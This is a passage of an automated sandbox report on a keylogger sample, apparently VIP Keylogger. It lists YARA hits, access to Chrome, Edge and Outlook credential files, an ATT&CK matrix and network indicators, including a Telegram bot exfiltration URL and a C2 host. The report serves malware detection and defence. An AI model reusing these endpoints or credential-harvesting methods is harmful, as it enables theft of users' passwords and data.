        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR
        Source: Yara match | File source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR
        Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
        Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
        Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
        Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: Yara match | File source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match | File source: 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR
        Source: Yara match | File source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR
        MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the report's count of matched signatures for that technique)

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
        Execution: PowerShell (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
        Persistence: LSASS Driver (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
        Privilege Escalation: Process Injection (312); LSASS Driver (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
        Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (312); DLL Side-Loading (1); Steganography
        Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
        Discovery: Security Software Discovery (21); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); System Information Discovery (113)
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
        Collection: Email Collection (1); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
        Command and Control: Web Service (1); Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
        Behavior Graph ID: 1541369 | Sample: g1TLK7mbZD.img | Startdate: 24/10/2024 | Architecture: WINDOWS | Score: 100

        Start
          Domains/IPs: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains
          Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected VIP Keylogger; 4 other signatures
          Started: 9236-pagaconferma-jpg.exe; cmd.exe; udfs.sys
        9236-pagaconferma-jpg.exe
          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 2 other signatures
          Started: svchost.exe
        cmd.exe
          Started: powershell.exe; conhost.exe
        svchost.exe
          Network: api.telegram.org 149.154.167.220, 443, 49807 TELEGRAMRU United Kingdom; checkip.dyndns.com 158.101.44.242, 49790, 49793, 49795 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.67.152, 443, 49791, 49792 CLOUDFLARENETUS United States
          Signatures: System process connects to network (likely due to code injection or exploit); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
        powershell.exe
          Dropped: \Device\CdRom0\9236-pagaconferma-jpg.exe, PE32
          Signatures: Loading BitLocker PowerShell Module; Powershell drops PE file

        Source | Detection | Scanner | Label | Link
        g1TLK7mbZD.img | 32% | ReversingLabs | Script-AutoIt.Trojan.ZmutzyPong |
        Source | Detection | Scanner | Label | Link
        \Device\CdRom0\9236-pagaconferma-jpg.exe | 100% | Joe Sandbox ML | |
        \Device\CdRom0\9236-pagaconferma-jpg.exe | 18% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        reallyfreegeoip.org | 104.21.67.152 | true | true | | unknown
        api.telegram.org | 149.154.167.220 | true | true | | unknown
        checkip.dyndns.com | 158.101.44.242 | true | true | | unknown
        checkip.dyndns.org | unknown | unknown | true | | unknown
        Name | Malicious | Antivirus Detection | Reputation
        https://reallyfreegeoip.org/xml/154.16.192.225 | true | | unknown
        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2024/10/2024%20/%2020:04:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | true | | unknown
        http://checkip.dyndns.org/ | true | | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://duckduckgo.com/chrome_newtab | svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow | svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search | svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://duckduckgo.com/ac/?q= | svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://api.telegram.org | svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://api.telegram.org/bot | svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://eicar.org/ | svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_ | svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://support.google.com/chrome/?p=plugin_flash | svchost.exe, 00000008.00000002.33970405843.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005977000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://chrome.google.com/webstore?hl=en | svchost.exe, 00000008.00000002.33970405843.00000000058C6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058B1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://varders.kozow.com:8081 | svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301 | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://www.eicar.org/download-anti-malware-testfile/: | svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570 | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://checkip.dyndns.org/q | svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://secure.eicar.org/eicar.com; | svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://duckduckgo.com/chrome_newtab0 | svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://secure.eicar.org/eicar.com.txtD | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT | svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmp | false
                                                                          unknown
